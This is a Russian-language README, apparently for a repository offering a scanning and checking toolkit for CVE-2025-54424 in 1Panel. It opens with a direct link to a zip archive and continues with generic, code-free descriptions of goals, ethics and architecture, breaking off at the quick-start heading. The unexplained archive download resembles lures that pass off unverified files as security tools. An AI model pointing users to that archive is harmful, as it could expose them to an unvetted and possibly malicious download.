https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip

CVE-2025-54424 — это уязвимость в 1Panel, связанная с обходом сертификатов клиента, что потенциально может привести к удаленному выполнению кода. Данный репозиторий предоставляет комплексный набор инструментов, предназначенных для помощи исследователям в проведении сканирования и проверки этой уязвимости в контролируемых лабораторных условиях. Инструмент ориентирован на безопасное тестирование, образовательные цели и соответствие исследованиям на затронутых системах. Проект не содержит нагрузок для эксплуатации или скриптов для несанкционированного доступа к внешним активам. Используйте только в средах с явным разрешением, соблюдая местное законодательство и требования соответствия.
Содержание
- О репозитории
- Цели и область проекта
- Правила использования и этика
- Обзор функциональности
- Принцип работы (высокоуровневая архитектура)
- Ключевые моменты безопасности и защиты
- Требования к среде и установка
- Быстрый старт (высокоуровневый процесс)
- Сценарии использования и рабочие процессы
- Руководство для разработчиков
- Тестирование и обеспечение качества
- Версии и релизы
- Руководство по участию
- Часто задаваемые вопросы
- Лицензия и разрешения
- Благодарности
О репозитории
Это набор инструментов для исследователей и инженеров по безопасности, разработанный на основе работы над CVE-2025-54424. Основная цель — предоставить прозрачную и воспроизводимую тестовую среду для оценки масштаба воздействия, выявления конфигурационных факторов и оценки эффективности исправлений в контролируемой среде. Проект делает акцент на документированных тестовых процессах, отслеживаемых результатах и защитных операциях с активами.
Цели и область проекта
- Предоставить четкую тестовую инфраструктуру для исследования безопасности версий 1Panel при наличии соответствующих разрешений.
- Включать компоненты, связанные с обнаружением и оценкой, но не содержать эксплойтов, оружейных скриптов или прямых реализаций атак на внешние активы.
- Позволить исследователям воспроизводить процесс обнаружения уязвимости в контролируемой лабораторной среде, оценивать эффективность патчей и изменений конфигурации, а также оформлять результаты в виде общих отчетов по оценке безопасности.
- Поддерживать локализованную конфигурацию, ведение журналов и экспорт результатов для упрощения аудита и соблюдения нормативных требований.
- Предоставлять четкие журналы изменений и примечания к релизам, чтобы исследователи могли отслеживать эволюцию версий.
Правила использования и этика
- Данный проект предназначен исключительно для использования в средах с явным разрешением. Несанкционированное тестирование безопасности чужих систем является незаконным.
- Не содержит нагрузок, скриптов или технических деталей для несанкционированного доступа, эксплуатации или распространения.
- Перед использованием оцените риски, убедитесь в наличии плана отката, резервных копий и аварийных процедур.
- Безопасно обрабатывайте тестовые данные, избегайте разглашения конфиденциальной информации в открытых каналах.
- Если вы обнаружите потенциальные улучшения или предложения по исправлению, сообщайте о них через официальный процесс участия, не размещая конфиденциальную информацию в открытых каналах.
Обзор функциональности
- Модуль безопасного сканирования (высокоуровневый): выполняет статическую и динамическую проверку конфигурации 1Panel, управления сертификатами, цепочки доверия сертификатов и других элементов в контролируемой среде для выявления возможных индикаторов риска безопасности.
- Оценка рисков и отчетность: на основе результатов сканирования создает читаемые отчеты по оценке безопасности, включая уровни риска, рекомендации по исправлению, приоритеты и отслеживаемую цепочку доказательств.
- Шаблоны руководств по тестированию безопасности: предоставляет шаблоны тестовых скриптов для выполнения в лабораторной среде, формы записи и форматы архивации результатов для обеспечения единообразия у исследователей.
- Репозиторий конфигураций: централизованные шаблоны конфигураций и примеры для воспроизведения сценариев тестирования в разных лабораторных условиях.
- Журналы и цепочка доказательств: систематизированный механизм ведения журналов для упрощения аудита, воспроизведения и обмена результатами оценки.
Принцип работы (высокоуровневая архитектура)
- Слои основных компонентов: уровень интерфейса (CLI/простой интерфейс) + уровень тестового драйвера (тестовые сценарии, тестовая обвязка) + уровень отчетности (сводка результатов, экспорт).
- Поток данных: ввод конфигурации и целевых активов → сканирование и оценка → агрегация и экспорт результатов → вывод отчета.
- Границы безопасности: все тесты выполняются в изолированной среде, доступ к файловой системе и сети ограничен, выходные данные тестов хранятся только локально или в пределах разрешенной области.
- Низкая связанность модулей: модули взаимодействуют через четко определенные интерфейсы, что упрощает замену, расширение или отключение конкретных функций.
Ключевые моменты безопасности и защиты
- Принцип контролируемой среды: запускайте только в тестовой лаборатории или песочнице, избегайте влияния на производственные системы.
- Принцип минимальных привилегий: тестовые учетные записи имеют только необходимые права, избегайте рискованных операций повышения привилегий.
- Управление журналами и доказательствами: структурированное ведение журналов для обеспечения отслеживаемости, аудита и соответствия требованиям защиты данных.
- Классификация рисков и меры по снижению: установка приоритетов исправления для выявленных высокорисковых элементов и предоставление практических стратегий смягчения.
- Соответствие и раскрытие информации: перед публикацией исследований получайте соответствующие разрешения и выбирайте подходящий путь раскрытия, следуя принципам ответственного раскрытия.
Требования к среде и установка
- Операционная система: основные Linux/Windows/macOS в виртуализированных средах, но рекомендуется тестировать в лаборатории на Linux.
- Версия Python (если применимо): Python 3.10+ или соответствующая среда выполнения с учетом зависимостей.
- Управление зависимостями: используйте виртуальную среду (например, virtualenv или conda) для изоляции зависимостей.
- Сетевые требования: тестирование проводится в контролируемой среде, без внешней обратной связи или несанкционированного сетевого доступа.
- Требования к ресурсам: в зависимости от масштаба тестирования, обычная лабораторная среда должна иметь достаточный объем CPU, памяти и дискового пространства для поддержки генерации журналов и отчетов.
Шаги установки (высокоуровневые)
- Клонируйте репозиторий локально.
- Создайте виртуальную среду и установите зависимости.
- Настройте параметры тестовой среды (целевые активы, параметры имитации сертификатов, уровень журналирования и т.д.).
- Запустите тестовый рабочий процесс, обращая внимание на вывод и отчеты.
Быстрый старт (высокоуровневый процесс)